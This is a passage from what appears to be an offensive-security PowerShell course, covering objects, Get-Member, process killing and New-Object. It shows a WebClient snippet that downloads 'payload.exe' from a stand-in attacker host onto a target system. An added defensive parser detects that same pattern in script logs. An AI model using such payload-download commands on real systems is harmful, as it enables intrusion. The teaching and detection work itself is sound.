Objects

Objects are essentially a representation of the data returned when a cmdlet runs. Unlike other scripting languages, where data is output as text most of the time, PowerShell outputs data as “objects” that originate from classes within the .NET Framework.

Objects consist of collections of properties, along with “methods” that we can use to manipulate the objects.

Let’s take the Get-Process cmdlet as an example. When we run the Get-Process cmdlet along with the “Format-List *” command, as we’ve seen earlier, we get a list of all processes along with their properties.

If we take a look at the “firefox” process object, for example, we can see it contains a number of different properties (Name, Id and Path, to name a few).

Each of the objects also has multiple methods that we can use to manipulate a particular object. To get a list of methods for objects associated with a cmdlet, we can use the “Get-Member” cmdlet as part of a pipeline command, like the following:

PS C:\> Get-Process | Get-Member -MemberType Method

The “Get-Member” cmdlet will give us an idea of all of the methods for associated objects, as can be seen below for the “Get-Process” objects.

We can see from the previous output that several methods might be of interest to us for the “Get-Process” objects, such as “Kill” or “Start,” which we could use to kill or start processes.

So far:

1. We’ve identified an object (in this case, a process “firefox”) we’d like to manipulate in some way using the “Get-Process” cmdlet.
2. We’ve determined the methods that are available for use with the objects that were returned by using the “Get-Process | Get-Member” cmdlet and pipeline.
3. And we’ve decided that the “Kill” method is the method we’d like to use for that process (as an example).

The next step is straightforward. We can simply call the “Get-Process” cmdlet, along with the “-Name” parameter for the “firefox” process, and pipe that to the “Kill” method we identified using the “Get-Member” cmdlet. Our command would look like the following:

PS C:\> Get-Process -Name "firefox" | Kill

Which effectively kills any Firefox processes.

This is just one example of how we can manipulate objects using their associated methods to help us meet our objectives.

In addition to using the built-in cmdlets to access a large number of objects, which we can then manipulate, we can also create .NET objects using the “New-Object” cmdlet, which greatly extends our capabilities.

We can use the “New-Object” cmdlet to create an instance of a .Net Framework object, or COM object.

These can be either created as a “Type” of the .NET Framework class, using fully qualified names of .NET classes, or, we can use the “ProgID” of a COM object.

As an example of creating a basic object based off of a .NET class with the “New-Object” cmdlet, we can use the “Net.WebClient” .NET system class to download a file to a target system with the following code:

PS C:\> $webclient = New-Object System.Net.WebClient
PS C:\> $payload_url = "https://attacker_host/payload.exe"
PS C:\> $file = "C:\ProgramData\payload.exe"
PS C:\> $webclient.DownloadFile($payload_url,$file)

In the example above (line by line):

1. We create a variable called “$webclient” which instantiates the “System.Net.WebClient” .NET class, which is used to create a web client.
2. We then create another variable ($payload_url), which is the URL to our payload.
3. The “$file” variable is then used as the location to which we want to save the payload on the target system.
4. And finally, we call the “$webclient” variable with the “DownloadFile” method, which downloads our payload.exe to the target.
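
Seen from the defender's side, the four lines above leave a recognizable shape in script text, for example in the ScriptBlockText field of a script block logging event (ID 4104). The following is an added example, not part of the original lesson: the helper name Find-WebClientDownload and the sample script with its placeholder host are assumptions made up for illustration, and the helper only parses the text with PowerShell's own parser without executing it.

```powershell
using namespace System.Management.Automation.Language   # PowerShell 5.0+

# Added example, not from the original page. Find-WebClientDownload is a
# hypothetical helper: it parses script text into an AST and never runs it.
function Find-WebClientDownload {
    param([Parameter(Mandatory)][string]$ScriptText)
    $tokens = $null; $errors = $null
    $ast = [Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)

    $clients = @{}   # variables assigned from New-Object ... Net.WebClient
    $strings = @{}   # variables assigned a string literal
    foreach ($a in $ast.FindAll({ param($n) $n -is [AssignmentStatementAst] }, $true)) {
        if ($a.Left -isnot [VariableExpressionAst]) { continue }
        $name = $a.Left.VariablePath.UserPath
        $cmd  = $a.Right.Find({ param($n) $n -is [CommandAst] }, $true)
        $lit  = $a.Right.Find({ param($n) $n -is [StringConstantExpressionAst] }, $true)
        if ($cmd) {
            $clients[$name] = ($cmd.GetCommandName() -eq 'New-Object' -and
                               $cmd.Extent.Text -match 'Net\.WebClient')
        } elseif ($lit) { $strings[$name] = $lit.Value }
    }
    # Resolve a call argument to a literal where the script text allows it.
    $resolve = { param($arg)
        if ($arg -is [StringConstantExpressionAst]) { return $arg.Value }
        $v = if ($arg -is [VariableExpressionAst]) { $strings[$arg.VariablePath.UserPath] }
        if ($v) { $v } else { $arg.Extent.Text }   # unresolved: keep expression text
    }
    $calls = $ast.FindAll({ param($n) $n -is [InvokeMemberExpressionAst] -and
                            $n.Member.Extent.Text -eq 'DownloadFile' }, $true)
    foreach ($c in $calls) {
        if ($c.Arguments.Count -lt 2) { continue }
        [pscustomobject]@{
            Line        = $c.Extent.StartLineNumber
            IsWebClient = ($c.Expression -is [VariableExpressionAst] -and
                           [bool]$clients[$c.Expression.VariablePath.UserPath])
            Url         = & $resolve ($c.Arguments[0])
            Destination = & $resolve ($c.Arguments[1])
        }
    }
}

# Constructed sample mirroring the pattern described above (placeholder host).
$sample = @'
$webclient = New-Object System.Net.WebClient
$payload_url = "https://example.invalid/payload.exe"
$file = "C:\ProgramData\payload.exe"
$webclient.DownloadFile($payload_url,$file)
'@
Find-WebClientDownload -ScriptText $sample | Format-List
```

Because the match is made on the parsed syntax tree rather than on raw text, differences in case, spacing or line breaks between the object creation and the method call do not affect the result.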

We’ll see more examples of creating .NET and COM objects in the module that follows, but for now, experiment with and research ways you can use the “New-Object” cmdlet to create objects we can leverage for offensive purposes.

And this concludes our lesson on PowerShell fundamentals. Although we really only scratched the surface with regard to PowerShell fundamentals, we encourage you to explore its capabilities and apply those to your offensive work. In the next module, we’ll be covering specific toolsets and even more useful things we can do with PowerShell for our purposes.
